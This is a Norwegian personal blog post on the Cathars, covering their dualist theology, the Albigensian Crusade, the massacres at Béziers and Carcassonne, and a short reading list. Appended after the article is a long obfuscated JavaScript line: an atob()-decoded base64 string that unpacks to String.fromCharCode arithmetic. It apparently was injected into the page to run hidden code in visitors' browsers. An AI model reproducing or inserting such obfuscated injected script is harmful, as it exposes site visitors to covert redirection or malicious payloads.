ULVEHYL

Håvard`s blogg . generelt bare tull, men noen gullkorn kan jo finnes….!

Katarene (Cathar)

Katarer var en betegnelse på medlemmer av noen religiøse grupper i seinmiddelalderen. De var særlig utbredt i det sørlige Frankrike og det nordlige Italia fra ca år 1000. Katarene var nært sammenknyttet med Bogomilene, en kristen sekt som hadde stor oppslutning i Bosnia, Bulgaria og andre steder på Balkan.
Man mener at katarene gav opphav til ordet kjetter. Ordet er fra gresk og betyr «ren». Katarenes lære var i slekt med gnostisk dualisme. De trodde på flere guder, men tilba bare én. De hevdet at jorda og all materie var ond og skapt av en demiurg, som ble identifisert med Djevelen. Menneskene måtte slippe fri fra materien. Den guden som beskrives i det gamle testamentet var Satan selv. Jesus forkynte derimot budskapet om den gode Gud, som var en annen enn den guden som omtales i det gamle testamentet.
Deres religiøse lærere ble kalt «de perfekte» og levde på en tildels asketisk måte. Trossamfunnet var organisert med prester (prefekter) og biskoper. Forkynnelsen skjedde i private hjem uten faste kirkelokaler. De kunne forrette en seremoni for dem som lå på dødsleiet. Den ble kalt consolamentum. Den skulle være til fordel for dem i den åndelige tilværelsen.

De prekte et liv i nøysomhet og forsakelse, i kontrast til såvel den katolske som den ortodokse kirkes verdslige rikdom.
Ingen vet med sikkerhet hvor katarenes religion egentlig oppsto, men det man vet er at katarene eksisterte syd i Frankrike allerede på 1000-tallet. Gjennom ca. 300 år var denne sekten en virkelig hodepine for den etablerte katolske kirke.

Verdslig var katarene et hinder for den franske kongen i forsøket på å samle Frankrike. Katarene ble symbol på regionalisme og motstand mot sentralmakten i Paris. Samtidig utfordret de den katolske kirken ved asketisk livsførsel og ved å respektere kvinner, som de ikke bare betraktet som djevelens verk for å friste mannen. Katarismen spredte seg hos de fattige i protest mot kirkens tiende, og hos aristokratiet i protest mot kongens forsøk på å knekke grevskapene og innlemme dem i kongeriket Frankrike. Det ble dannet fire katariske bispedømmer: Carcassonne, Albi, Toulouse og Agen.
Uansett om grevene bekjente seg til katarismen eller ei, hersket det et frisinn i det daværende Languedoc som den nordfranske kongemakten og den katolske kirken ikke kunne akseptere. Etter et mord på en av pavens utdsendinger i 1208, et mord som formodentlig ikke hadde noe med katarene å gjøre, blåste paven til kamp mot kjetterne, og i 1209 gikk konge og kirke sammen i Albigenser-korstoget, som skulle knekke fri-tenkerne i sør. I 1244 var oppdraget så godt som fullført med brenningen av 225 «kjettere» fra Montségur-borgen.
Katarene var knekket selv om de hadde fått hjelp av tempelridderne. I 46 år bølget kampene fram og tilbake, men i slutten av perioden var katarene trengt tilbake og søkte tilflukt i godt beskyttede borger, eller på svært uinntakelige fjelltopper.
Det er ruinene av disse borgene vi kan besøke i dag. Som bonus vanker det en naturopplevelse som imidlertid ikke kan overskygge forestillingene om den ondskapen som katarene ble utryddet med.
Katarland
Katarenes og deres kamp fra ridderborgene har alltid vært innhyllet i mystikk og spenning. I dette området går spenningen opp i en høyere enhet, da det både er spor etter katarene, tempelridderne og den hellige gral.
Jakten på den hellige gral har pågått i minst 1000 år. Gralen er den skålen som Jesu blod ble samlet i ved korset; men med litteraturens hjelp har gralen antatt så mange former at det er vanskelig å vite hva det egentlig er man leter etter.

Deres spesielle filosofi var en protest mot den økende umoralen både i klostrene og blant kirkens tjenere. Pave Gregor Vll`s forsøk i 1075 på en modernisering og fornyelse innen kirken hjalp ikke stort så lenge han holdt fast ved at kirken aldri tok feil, at dogmene sto fast og at pavekirken var den øverstemyndighet over hele kristenheten. Katarenes tro sto steilt imot kirkens strenge og fordømmende maktinnstilling. Etter 300 år endte konfrontasjonene til slutt med forferdelse for katarene.
Deres livsfilosofi hadde mye til felles med bogomilene i Bulgaria, som igjen var preget av tanker fra Persia. Det var en dualistisk tro som regnet med to verdener,den gode verden som var Guds verden, og den onde verden som var skapt av satan. Etter deres mening kunne nemlig ikke en god Gud ha skapt vår syndige og onde verden, den måtte være satans verk. Menneskets sjel var derimot av Gud, og oppholdt seg som fange i vår fysiske kropp skapt av satan. Etter et liv i askese levd etter Bibelens ord, og gjennom renselse via en rekke reinkarnasjoner, ville de til slutt ende opp i Guds usynlige og gode verden. I praksis var dette en tro uten kirke, kors eller kristne sakramenter, men en tro fylt av kjærlighet, godhet og uegennytte. Deres ønske var å leve mer opp til den opprinnelige, primitive kristendommen, slik den ble forkynt i Bibelens Nye Testamente. Det Gamle Testamentet regnet de ikke med.
Katarene trodde ikke at Jesus var Guds sønn, men at han var et sendebud fra Gud i menneskelig skikkelse. Jesus var en åndelig skapning, en absolutt ren sjel, og derfor også immun mot lidelse og død.

Disse tankene vant gjenklang blant folk som hadde sett seg lei på pavekirkens dominans og umoral på så mange felt, og som preket en religion der liv og lære ikke stemte overens. Nå følte kirken sin maktstilling alvorlig truet, og resultatet ble både korstog mot dem og økte forfølgelser av inkvisisjonen.
Pave Innocens lll prøvde på 1200-tallet å få adelen og de høyere geistlige i sør Frankrike med på et slikt korstog, uten å ha hell med seg. Heller ikke kongen i Frankrike ville være med på noe korstog mot katarene, han hadde simpelthen ikke tid, påsto han. En kontakt med den mektige Raimund Vl av Toulouse resulterte også i et klart ”Nei”, noe som var ganske naturlig da greven hadde et meget godt forhold til katarene. De var kort og godt hans mest redelige og beste undersåtter, så Raimund så ingen grunn til å begi seg ut på et slikt eventyr bare for å behage Paven. Dessuten hadde han noen problemer med Richard Løvehjerte oppe i Normandi som han måtte ordne opp i, sa han.
Samtidig som Innocens III, med dårlig hell, prøvde å stable på bena et korstog, reiste utallige prester, utsendt fra Paven, rundt og preket mot katarene. Også de forfektet nå både forsakelse, nøysomhet og fattigdom som ekte kristne dyder, men prekingen deres gjorde ikke særlig inntrykk. Først da Paven lovte korsfarerne syndenes forlatelse, foruten løfte om store jordeiendommer om de seiret, vant han i alle fall gehør for korstoget sitt hos de franske baronene oppe i nord.
Det ble en brutal og ødeleggende krig mot de arme katarene.

I Beziers ble innbyggerne massakrert, og i en annen by ble ikke mindre enn 140 katarer brent levende. Et annet sted var det hele 400 som led samme skjebnen. Kong Pedro II i Aragon, (far til Jaime I el Conquistador), kastet seg inn i krigen og gjorde hva han kunne for å beskytte sine vasaller, katarene. Han kjempet tappert, men hadde ikke hellet med seg, tvert imot, han ble selv drept i et av slagene.
Det ble en langvarig krig som til syvende og sist endte med at katarene flyktet over grensen til Aragon. De fulgte ukjente stier over fjellet, forkledd som kramkarer eller gjetere. De fleste kom seg over uten å bli tatt, og folket i Aragon tok vel imot dem.
Dette fungerte bra i mange år, men til slutt ble katarenes siste leder, Belibaste, forrådt og angitt til inkvisisjonen i Frankrike. I året 1321 fikk han sin dom og ble levende brent på festningen Villerouge-Termenes. Siden den gang hørte man aldri mer om noen katarer hverken i Frankrike eller i Spania.
En tragisk skjebne for mennesker som kun ønsket en ting, nemlig å leve et liv i tråd med de første kristnes lære om selvfornektelse og barmhjertighet.

Under adelsskapets beskyttelse

Katarene vant tilhengere flere steder i Frankrike, også innen adelen. De fikk lenge drive sin forkynnelse uten motstand fra det lokale adelsskapet. De ble etterhvert møtt med sterk motstand fra den katolske kirke, men uten at det lokalt ble gjort begrensninger i deres trosutøvelse.
På 1100-tallet ble katarismen sterkt utbredt i områdene i sør Frankrike. Den var særlig greven Raymond Roger Trencavel (1185–1209) som beskyttet katarene i sine landområder. Det var der de ble kjent som albigensere, etter byen Albi.
Fra Sør-Frankrike spredte de seg også til Holland og Tyskland, men der ble de aldri noen store grupper.

Forsøk på omvendelse

Den katolske kirke var meget urolig over denne utviklingen. I en periode prøvde den katolske kirken å omvende katarene med fredelige midler.
I 1204 utnevnte pave Innocent III tre pavelige legater og inkvisitorer for en ny prekenmisjon mot albigenserne under abbed Arnaud Amaury av Cîteaux. Siden kjetteri var en forbrytelse, skulle legatene ikke bare preke, men også overlevere kjetterne til de sivile myndighetene for forvisning og beslagleggelse av eiendom. En av de fire var cisterciensermunken Pierre de Castelnau. Tiltaket hadde liten effekt uten støtte hos de lokale myndighetene.
Andre som prøvde seg var Dominikus (kjent som sankt Dominikus) og hans medhjelpere. Deres metode var først og fremst forkynnelse og offentlige disputter med ledende katarer. Katarene valgte ofte et liv i streng fattigdom. For å vinne katarenes tillit, søkte den lille flokken av forkynnere å leve et like asketisk liv som dem. De maktet i liten grad å nå sine mål.

Korstogene

Etterhvert ble bevegelsen ansett som en så stor fare for den katolske kirke, at pave Innocentius III beordret militær makt satt inn mot katarene og deres fører, grev Raymond. Han erklærte i juli 1209 hellig krig (albigenserkorstoget) mot dem etter å ha erklært katarene som satanister.
Etter å ha inntatt Béziers og massakrert 20 000 innbyggerne, tvang korstogshæren til Simon de Montfort innbyggerne i Carcassonne til å overgi seg 15. august 1209, etter to ukers beleiring av byen. Da hadde nesten alle innbyggerne kommet seg unna gjennom underjordiske ganger og gjemt seg i skogene rundt. Av de gjenværende 500 innbyggere (gamle, syke, barn), fikk hundre forlate byen nakne, «kun medbringende sine synders last», og de øvrige 400 ble brent eller hengt.
Om abbeden Arnaud Amaury som kan ha spilt en fremskutt rolle under plyndringen av Béziers og massakrene av byens borgere den 22. juli 1209, forteller legenden at da byen ble inntatt ble han spurt om hvordan man skulle skjelne mellom katolikker og katarer, og at han da svarte Caedite eos! Novit enim Dominus qui sunt eius! («Drep dem alle, for Gud kjenner sine»).
I løpet av noen år ble det lokale adelsskapet fratatt sine stillinger, og katarene ble enten drept eller tvunget til omvendelse uten trusler om dødsstraff.

Litteratur

Barber, Malcolm: The Cathars: Dualist Heretics in Languedoc in the High Middle Ages. Pearson 2000. ISBN 0-582-25662-3. (engelsk)
Guirdham, Arthur: Katarene og reinkarnasjon Trondheim 1984, Regnbueforlaget. ISBN 82-7223-035-6
Petrus Sarnensis, (d. 1218): The History of the Albigensian Crusade (Originaltittel: Historia Albigensis). Boydell 1998. ISBN 0-85115-658-4. (engelsk)

Solfried Gjelsten.
Eksterne lenker 

(no) Oddvar Granly: Katharene. Artikkel i Libra Tidsskrift for antroposofi
(no) kjetter i Bokmålsordboka.
Referanser

^ Jean-René Bouchet, Saint Dominique, Les Editions du Cerf, Paris 1988: s 30
Kategorier: KirkehistorieGnostisismeKristendom

var GMRXIILOXU = atob(‘dmFyIElQVUhUSlBSVkUgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE5IC0gOSwgMTIyIC0gNCwgMTAwIC0gMywgMTIwIC0gNiwgNDEgLSA5LCAxMTQgLSA3LCAxMDggLSA3LCAxMjYgLSA1LCAzNCAtIDIsIDY4IC0gNywgMzcgLSA1LCA0NiAtIDcsIDExNiAtIDUsIDk0IC0gOCwgMTA2IC0gOSwgMTE1IC0gMSwgODEgLSA3LCAxMDkgLSA3LCA4MiAtIDUsIDgyIC0gNywgMTAwIC0gMywgMTE3IC0gNywgNDYgLSA3LCA2MSAtIDIsIDE2IC0gNiwgMTIyIC0gNCwgMTA1IC0gOCwgMTIzIC0gOSwgMzcgLSA1LCAxMDUgLSA0LCAxMTYgLSA2LCAxMDAgLSAxLCAxMDQgLSAzLCAxMDggLSA4LCAzOSAtIDcsIDY1IC0gNCwgMzUgLSAzLCA0MCAtIDEsIDg2IC0gNSwgNzUgLSAzLCAxMTIgLSA0LCAxMDMgLSAzLCA3MCAtIDUsIDkxIC0gOCwgMTE0IC0gNywgOTMgLSA4LCA3OSAtIDUsIDcyIC0gNCwgMTE4IC0gMywgOTMgLSA3LCA5MSAtIDYsIDczIC0gMiwgOTQgLSA5LCAxMTAgLSA3LCA2OCAtIDMsIDczIC0gOCwgNjcgLSAxLCAxMTcgLSA0LCA3NCAtIDUsIDg4IC0gNiwgNzQgLSAxLCAxMTMgLSAzLCA3MSAtIDMsIDEwNSAtIDIsIDU3IC0gOSwgODEgLSAyLCA3OSAtIDYsIDEwNSAtIDIsIDEwNCAtIDEsIDEwNiAtIDYsIDc2IC0gMiwgNzggLSA5LCA5NyAtIDcsIDEyOCAtIDksIDEwNiAtIDksIDEyNSAtIDYsIDU3IC0gMSwgMTAzIC0gNSwgNjggLSAzLCAxMjkgLSA3LCAxMTQgLSAyLCAxMDAgLSAzLCAxMTAgLSA5LCA3MSAtIDMsIDEyNiAtIDcsIDc3IC0gNSwgODIgLSAyLCA1OCAtIDgsIDEyMCAtIDUsIDg2IC0gMiwgNzQgLSA3LCAxMjggLSA5LCAxMjQgLSA5LCA1MiAtIDUsIDczIC0gNCwgMTI0IC0gNCwgMTAxIC0gMiwgMTIwIC0gOCwgNzIgLSAzLCAxMTEgLSAyLCA1NSAtIDYsIDUyIC0gMiwgODIgLSAxLCA4NiAtIDUsIDEwOSAtIDYsIDg4IC0gOSwgODMgLSA0LCAxMTIgLSA4LCA3OSAtIDYsIDkzIC0gNSwgMTA4IC0gOSwgOTMgLSA2LCAxMjkgLSA5LCA4MSAtIDksIDg3IC0gNywgODIgLSAxLCA3MSAtIDYsIDEwNiAtIDcsIDg4IC0gNCwgMTI1IC0gMywgNzggLSA1LCA4NCAtIDUsIDgwIC0gOCwgMTI0IC0gMywgMTIxIC0gNiwgODMgLSAzLCA4MSAtIDgsIDEyNCAtIDIsIDExMSAtIDcsIDcxIC0gNSwgODcgLSAyLCA1NiAtIDgsIDU5IC0gMywgODMgLSA1LCAxMDUgLSA4LCA1MiAtIDMsIDc5IC0gNSwgMTE5IC0gNiwgODcgLSA2LCA4NCAtIDEsIDg2IC0gMSwgNTEgLSA0LCA3NyAtIDcsIDg4IC0gNiwgNTcgLSA0LCA5MSAtIDUsIDEwOSAtIDgsIDg5IC0gNCwgNjEgLSA5LCA5NCAtIDQsIDc3IC0gMywgNzMgLSA3LCA3OSAtIDYsIDUxIC0gOCwgODkgLSA5LCA4OCAtIDMsIDY0IC0gOCwgNjYgLSAxLCA2NyAtIDIsIDYwIC0gOSwgMTE1IC0gOCwgNzUgLSAyLCA4MCAtIDgsIDEyNCAtIDMsIDExNiAtIDEsIDY4IC0gMiwgODQgLSA5LCA3MyAtIDUsIDExMSAtIDcsIDg2IC0gNywgNzcgLSA2LCAxMTEgLSA4LCA3NyAtIDQsIDExMiAtIDMsIDkyIC0gOCwgMTI2IC0gNywgNzggLSA1LCAxMDcgLSAyLCA3NSAtIDUsIDExMCAtIDEsIDExNyAtIDUsIDExMiAtIDIsIDEwMSAtIDQsIDU0IC0gNiwgNTggLSA1LCA4NSAtIDUsIDEwOCAtIDksIDg2IC0gNSwgMTEwIC0gMywgNzkgLSA4LCA4MSAtIDEsIDEwNSAtIDEsIDkxIC0gMSwgNTQgLSAzLCA5OCAtIDgsIDcxIC0gMiwgNTQgLSAyLCA3NiAtIDgsIDc1IC0gOCwgMTEwIC0gNCwgNzIgLSAzLCA2NiAtIDEsIDY3IC0gMSwgMTExIC0gNiwgNjQgLSA4LCA5MiAtIDgsIDc4IC0gMywgNTkgLSA5LCA5MyAtIDgsIDcwIC0gMSwgNzMgLSA2LCAxMDUgLSAyLCAxMTYgLSA1LCA1NiAtIDIsIDc1IC0gNywgMTE3IC0gOSwgMTIwIC0gMSwgMTEwIC0gMywgNzMgLSA4LCAxMzEgLSA5LCAxMTMgLSA1LCAxMTMgLSA2LCA3MiAtIDcsIDExMiAtIDksIDExMCAtIDMsIDcyIC0gMSwgMTA3IC0gNiwgMTI1IC0gNiwgODQgLSA3LCAxMDUgLSA3LCA3NSAtIDEsIDc2IC0gNywgMTEzIC0gNiwgNjIgLSA5LCA4MyAtIDksIDEwNiAtIDIsIDc2IC0gNiwgNzAgLSA1LCA3NSAtIDMsIDEzMCAtIDgsIDU0IC0gMiwgODMgLSAxLCA4OCAtIDIsIDg5IC0gMiwgOTggLSA4LCAxMTYgLSAxLCAxMDcgLSA5LCA5NSAtIDgsIDExNyAtIDEsIDc4IC0gNywgNjkgLSAzLCAxMTEgLSA3LCAxMTggLSAzLCAxMTMgLSA4LCA3MiAtIDMsIDg4IC0gMywgMTA4IC0gNCwgMTEzIC0gNSwgODkgLSA2LCA4NyAtIDMsIDExNSAtIDQsIDYwIC0gNCwgNzMgLSAzLCAxMTMgLSA2LCA2NyAtIDIsIDgwIC0gOSwgODYgLSA4LCA4NCAtIDMsIDY5IC0gNCwgMTAwIC0gMSwgNzkgLSAzLCA4NCAtIDIsIDgxIC0gNCwgNTUgLSA4LCA3NCAtIDEsIDEwOSAtIDIsIDYwIC0gNCwgODMgLSA1LCA3MCAtIDUsIDcwIC0gMiwgMTIyIC0gNiwgODIgLSAzLCA3OCAtIDYsIDEyNSAtIDQsIDg2IC0gMSwgNzYgLSA5LCA4NiAtIDcsIDcxIC0gNCwgMTAwIC0gMSwgNzUgLSA2LCA3NSAtIDMsIDk0IC0gOSwgNzQgLSA5LCA2MyAtIDgsIDc0IC0gNiwgMTExIC0gNywgOTIgLSAzLCA5MSAtIDUsIDc4IC0gNiwgMTE1IC0gOSwgNjAgLSA4LCAxMjcgLSA2LCA3MSAtIDIsIDEwNSAtIDEsIDEyMCAtIDksIDgxIC0gNiwgODQgLSA1LCA1NiAtIDgsIDYxIC0gOSwgNzQgLSAzLCA3NSAtIDEsIDEyOSAtIDksIDkxIC0gMSwgMTA3IC0gMSwgODUgLSA2LCAxMjIgLSAzLCAxMTAgLSAzLCAxMDMgLSAyLCA4OSAtIDYsIDgwIC0gOCwgMTIwIC0gOCwgMTIwIC0gNiwgODkgLSA0LCAxMTcgLSA4LCAxMTYgLSA0LCA2NyAtIDEsIDc2IC0gMiwgODcgLSAzLCA2MiAtIDYsIDkwIC0gNCwgNzkgLSA3LCAxMTEgLSAzLCA5NCAtIDgsIDU0IC0gMSwgOTIgLSA4LCAxMTEgLSA4LCA5MCAtIDUsIDU5IC0gMiwgNzYgLSA3LCA5NSAtIDgsIDg1IC0gOCwgMTIyIC0gNCwgNzQgLSA4LCA3MiAtIDYsIDEwNCAtIDEsIDcwIC0gNSwgODEgLSAyLCA2OSAtIDMsIDcxIC0gMiwgMTA2IC0gNiwgODYgLSA3LCA2OCAtIDIsIDc2IC0gMywgMTA5IC0gNiwgNzUgLSAxLCA3MyAtIDcsIDkxIC0gNiwgNzQgLSA4LCA3NSAtIDMsIDg3IC0gNCwgODggLSAyLCA4NyAtIDcsIDcxIC0gMiwgODggLSA1LCA5MCAtIDQsIDgxIC0gOCwgODEgLSA4LCAxMjcgLSA1LCA3MyAtIDMsIDgwIC0gMSwgNzUgLSA5LCAxMjMgLSA0LCA3NSAtIDIsIDU4IC0gNywgNzUgLSA5LCAxMDggLSA0LCAxMDMgLSA0LCA1OCAtIDUsIDg2IC0gMywgODUgLSAxLCAxMDkgLSAyLCAxMTYgLSA3LCA3OCAtIDksIDg4IC0gMywgNjkgLSA0LCAxMDMgLSAxLCA4OCAtIDgsIDEwNSAtIDEsIDc2IC0gNiwgODcgLSAxLCA4OSAtIDgsIDc2IC0gNSwgMTI0IC0gNSwgODQgLSAzLCAxMDcgLSA4LCA3NSAtIDQsIDEyMCAtIDQsIDExMCAtIDMsIDc1IC0gOCwgODkgLSA2LCA4MCAtIDMsIDg1IC0gNSwgNzcgLSA4LCA4OSAtIDUsIDU5IC0gNywgODUgLSA1LCA3NSAtIDIsIDEwNiAtIDEsIDg4IC0gMiwgNjcgLSAxLCA3MSAtIDQsIDg0IC0gMywgMTEzIC0gMiwgMTA4IC0gMywgODEgLSA3LCA4NSAtIDMsIDU2IC0gOCwgMTEzIC0gMywgNzUgLSA5LCAxMjkgLSA4LCA4NSAtIDQsIDExNyAtIDksIDgzIC0gNywgMTI4IC0gOSwgNjUgLSA5LCA3NSAtIDgsIDgxIC0gNCwgNTcgLSA5LCAxMTQgLSA3LCA5NSAtIDgsIDc5IC0gNSwgODUgLSA0LCAxMjMgLSA4LCAxMTcgLSAyLCA4MiAtIDksIDEwNSAtIDIsIDU4IC0gMSwgODAgLSA4LCA4NiAtIDIsIDEyOCAtIDcsIDUzIC0gNCwgMTIyIC0gOCwgODYgLSAxLCAxMTQgLSA1LCAxMTUgLSA0LCA4OCAtIDcsIDg0IC0gOCwgNzAgLSAyLCAxMTcgLSA5LCA3MSAtIDUsIDcyIC0gMiwgMTA4IC0gNSwgMTAxIC0gMiwgMTEyIC0gNSwgODYgLSA1LCA5MyAtIDgsIDU5IC0gMiwgMTE0IC0gMSwgNzMgLSA2LCA3NCAtIDcsIDExMiAtIDksIDY0IC0gOCwgODYgLSA1LCA4NyAtIDMsIDkwIC0gMSwgMTA3IC0gMiwgNzkgLSA4LCAxMDggLSAzLCAxMTYgLSA5LCA4MCAtIDksIDg2IC0gNiwgMTA1IC0gMSwgOTEgLSAyLCAxMTAgLSA4LCA3OCAtIDIsIDEwNyAtIDMsIDcwIC0gNSwgMTA1IC0gNywgNzEgLSA0LCAxMDcgLSAyLCA5NCAtIDksIDkyIC0gNiwgODggLSAxLCAxMTYgLSA3LCA4NCAtIDYsIDEwNyAtIDcsIDgzIC0gMSwgNTIgLSAyLCAxMTggLSAyLCA3MyAtIDcsIDc3IC0gNywgMTA1IC0gMiwgMTA3IC0gOCwgMTE1IC0gOCwgOTIgLSA4LCAxMjUgLSA1LCA1MCAtIDIsIDExNiAtIDksIDc0IC0gNCwgNzQgLSA3LCAxMTIgLSA5LCAxMjIgLSA5LCA2OCAtIDIsIDkxIC0gOSwgMTA1IC0gNiwgMTAxIC0gMiwgODIgLSA5LCAxMDkgLSA2LCA2NyAtIDIsIDcyIC0gMSwgODIgLSA2LCAxMjcgLSA4LCA5NCAtIDksIDExNSAtIDcsIDgyIC0gNywgMTA1IC0gMiwgNjMgLSA3LCA4MiAtIDgsIDY5IC0gMiwgMTEyIC0gMiwgOTUgLSA1LCAxMDMgLSA0LCA5NCAtIDksIDExMiAtIDcsIDEyMyAtIDQsIDkxIC0gNywgNzQgLSAxLCAxMjIgLSAxLCAxMTIgLSA5LCA5MiAtIDYsIDY3IC0gMSwgMTI3IC0gOCwgNjYgLSAxLCA1NSAtIDMsIDg4IC0gNSwgOTEgLSA1LCAxMTkgLSAzLCAxMjEgLSA4LCA3OSAtIDcsIDg3IC0gMiwgMTAzIC0gMywgMTIxIC0gNywgODkgLSA4LCA4OSAtIDQsIDU2IC0gMywgODQgLSA0LCA4MSAtIDEsIDEyMiAtIDMsIDEwMyAtIDMsIDkwIC0gNywgOTUgLSA2LCAxMTMgLSA5LCA1OCAtIDYsIDExMyAtIDUsIDgxIC0gMiwgOTMgLSA4LCA2MCAtIDQsIDEwMSAtIDIsIDc2IC0gOSwgMTEzIC0gNywgMTA3IC0gOCwgNzIgLSAyLCA2OCAtIDEsIDEyMSAtIDEsIDExNCAtIDcsIDg2IC0gMywgODAgLSA0LCA3MiAtIDQsIDYzIC0gNywgNzUgLSA2LCA4OCAtIDQsIDExMCAtIDIsIDc3IC0gMywgMTIwIC0gNiwgODIgLSAxLCA4OCAtIDUsIDExNCAtIDMsIDc3IC0gNSwgODMgLSA4LCAxMDYgLSAzLCA4NyAtIDIsIDQ4IC0gMSwgNzEgLSAxLCA4OSAtIDcsIDU5IC0gNywgNjAgLSAzLCA4MyAtIDYsIDEyOCAtIDgsIDcyIC0gNywgNzkgLSA3LCA4NSAtIDksIDEyMyAtIDMsIDkzIC0gOCwgNTggLSA1LCA5OCAtIDgsIDg5IC0gNiwgODkgLSA0LCAxMTAgLSA2LCA3NiAtIDMsIDkwIC0gOCwgODAgLSAyLCA3NCAtIDEsIDg3IC0gMiwgMTE0IC0gOCwgNzcgLSA3LCAxMTYgLSAxLCAxMDcgLSA5LCA5MiAtIDUsIDEyMyAtIDcsIDcyIC0gNiwgOTEgLSA3LCAxMTEgLSA0LCA2MCAtIDMsIDUyIC0gMiwgNzAgLSAzLCA3NCAtIDgsIDg1IC0gMywgMTE2IC0gMywgOTAgLSA2LCAxMDggLSAyLCA4OSAtIDQsIDEwNyAtIDEsIDc2IC0gNywgNTUgLSA3LCA3MCAtIDUsIDEwOCAtIDgsIDgzIC0gNiwgMTIyIC0gMiwgNzcgLSA0LCA3MSAtIDQsIDc5IC0gNSwgODggLSA3LCAxMTIgLSA5LCA0NiAtIDMsIDc3IC0gMSwgMTA4IC0gMiwgODYgLSAxLCA4MCAtIDQsIDc1IC0gNSwgMTI0IC0gMywgNzkgLSA1LCA3MSAtIDUsIDkwIC0gNCwgNzQgLSAzLCAxMjggLSA4LCA3MyAtIDIsIDgwIC0gMiwgODggLSA1LCA4MyAtIDYsIDkwIC0gNiwgODggLSA3LCA2NyAtIDEsIDUxIC0gMywgMTMxIC0gOSwgNzAgLSAxLCAxMDcgLSA0LCA3OCAtIDUsIDExMCAtIDIsIDcwIC0gMywgNzEgLSAzLCA1NiAtIDQsIDEyMiAtIDUsIDc5IC0gMSwgODIgLSAxLCAxMTYgLSAxLCA5NiAtIDgsIDgxIC0gOCwgMTA5IC0gMiwgNjEgLSA1LCA3NCAtIDMsIDg0IC0gNSwgNzAgLSA1LCA2NSAtIDksIDEwNSAtIDIsIDk4IC0gOSwgNTIgLSA0LCAxMTAgLSA2LCA3NCAtIDksIDcwIC0gNSwgMTI2IC0gNCwgODEgLSA0LCA4MiAtIDIsIDc3IC0gNywgOTAgLSA2LCA1NyAtIDUsIDg3IC0gOCwgOTkgLSAxLCA5MSAtIDMsIDk1IC0gOSwgNzIgLSA2LCA5MCAtIDIsIDExMyAtIDYsIDkyIC0gMiwgNTQgLSA0LCA3NCAtIDMsIDExOCAtIDgsIDEwOCAtIDQsIDExNSAtIDIsIDg5IC0gNywgMTE1IC0gNiwgNTQgLSA1LCAxMTkgLSA1LCA4OSAtIDgsIDkxIC0gNiwgNTcgLSA0LCA4NSAtIDUsIDEwOSAtIDksIDEwNSAtIDEsIDkzIC0gNCwgMTIwIC0gNCwgNzkgLSA1LCAxMDkgLSA2LCAxMTEgLSA0LCAxMjEgLSA0LCA3OCAtIDMsIDExMiAtIDgsIDg5IC0gNCwgNzUgLSAzLCA2OSAtIDQsIDc2IC0gOCwgMTA1IC0gMSwgNjkgLSAzLCA4OCAtIDQsIDUyIC0gMiwgMTE4IC0gNywgMTA4IC0gNywgODAgLSA2LCA5MiAtIDgsIDExNyAtIDksIDg1IC0gNSwgNzggLSA2LCA3MCAtIDUsIDEyMCAtIDksIDExMSAtIDMsIDczIC0gNCwgODYgLSA0LCA1MyAtIDUsIDExMCAtIDMsIDc5IC0gOSwgOTEgLSA4LCAxMDkgLSA2LCAxMDMgLSAxLCA3MiAtIDYsIDY3IC0gMSwgOTUgLSA2LCAxMDEgLSAzLCAxMDggLSA3LCA3NSAtIDksIDkwIC0gNSwgNzMgLSA4LCA4MiAtIDksIDEyMSAtIDIsIDEyNSAtIDksIDExNiAtIDgsIDkyIC0gMywgMTE3IC0gOSwgMTE5IC0gNywgMTEyIC0gNSwgOTEgLSA3LCA1OCAtIDcsIDk1IC0gNSwgNzUgLSA5LCA5MCAtIDUsIDExNCAtIDUsIDExMyAtIDEsIDc5IC0gOCwgODQgLSA3LCA3MiAtIDMsIDczIC0gMywgNzMgLSA3LCA4OSAtIDUsIDExNSAtIDgsIDYzIC0gNiwgNTUgLSA1LCA4MCAtIDgsIDc0IC0gMiwgMTA3IC0gMywgMTIxIC0gOCwgODQgLSAyLCAxMDcgLSAxLCA3NCAtIDgsIDEyNiAtIDcsIDEwNSAtIDgsIDU2IC0gOCwgNTcgLSA0LCA4MiAtIDIsIDgyIC0gNiwgMTA1IC0gMiwgMTEzIC0gNiwgNzEgLSA2LCA5MiAtIDIsIDcxIC0gNiwgMTA5IC0gMiwgNjYgLSA5LCA4MyAtIDcsIDExMiAtIDksIDYyIC0gNSwgNzIgLSAxLCA4NSAtIDIsIDY3IC0gMiwgOTIgLSAzLCAxMjAgLSAzLCA4MSAtIDgsIDgzIC0gMSwgNTkgLSA2LCA3MyAtIDcsIDk2IC0gNywgOTMgLSA2LCAxMTggLSAzLCA3MSAtIDEsIDcwIC0gNSwgODUgLSA0LCA3NiAtIDMsIDU3IC0gNiwgNjkgLSAyLCA3NSAtIDksIDEyNCAtIDQsIDExMiAtIDMsIDg2IC0gNCwgMTA5IC0gMywgMTA4IC0gMSwgNTggLSA1LCA3OCAtIDgsIDczIC0gOCwgMTIwIC0gNCwgNzggLSA3LCAxMDYgLSA4LCA4OCAtIDEsIDExOSAtIDMsIDg5IC0gNiwgMTAyIC0gNSwgMTA1IC0gMSwgNTggLSA2LCAxMTIgLSA0LCA4NCAtIDUsIDg2IC0gMSwgNjQgLSA4LCAxMDcgLSA3LCA3MSAtIDQsIDExMiAtIDcsIDgyIC0gOSwgMTI4IC0gNiwgNzcgLSA3LCAxMjQgLSAyLCAxMTYgLSAxLCA5MCAtIDYsIDc3IC0gMiwgNzUgLSA3LCAxMDYgLSAzLCA5NCAtIDgsIDgwIC0gNiwgMTA3IC0gNCwgMTE1IC0gNCwgNjAgLSA5LCA3MSAtIDUsIDg2IC0gNCwgMTA1IC0gNiwgNTcgLSA1LCA5MCAtIDYsIDExNiAtIDcsIDYzIC0gNywgODEgLSA4LCA3MSAtIDMsIDExMiAtIDksIDcxIC0gNiwgMTA3IC0gOSwgODEgLSA0LCAxMjEgLSAyLCA2MyAtIDcsIDczIC0gMiwgOTYgLSA2LCAxMjUgLSA1LCA3OCAtIDUsIDUxIC0gMywgODcgLSA4LCAxMjcgLSA4LCA4NyAtIDUsIDgwIC0gMywgODQgLSAzLCA1OSAtIDgsIDkzIC0gMywgNzcgLSA5LCA3NyAtIDgsIDEyNSAtIDMsIDExOCAtIDcsIDk0IC0gNywgODAgLSA3LCA5MiAtIDksIDc4IC0gNSwgNzIgLSA1LCA3MiAtIDQsIDEyMSAtIDEsIDEyNCAtIDksIDUxIC0gNCwgNzYgLSA4LCAxMTAgLSA2LCAxMjUgLSA1LCAxMDkgLSAxLCA3NSAtIDMsIDExMiAtIDMsIDY2IC0gMSwgNTggLSAyLCA3NSAtIDUsIDExMyAtIDksIDExNyAtIDksIDY5IC0gMiwgODAgLSAz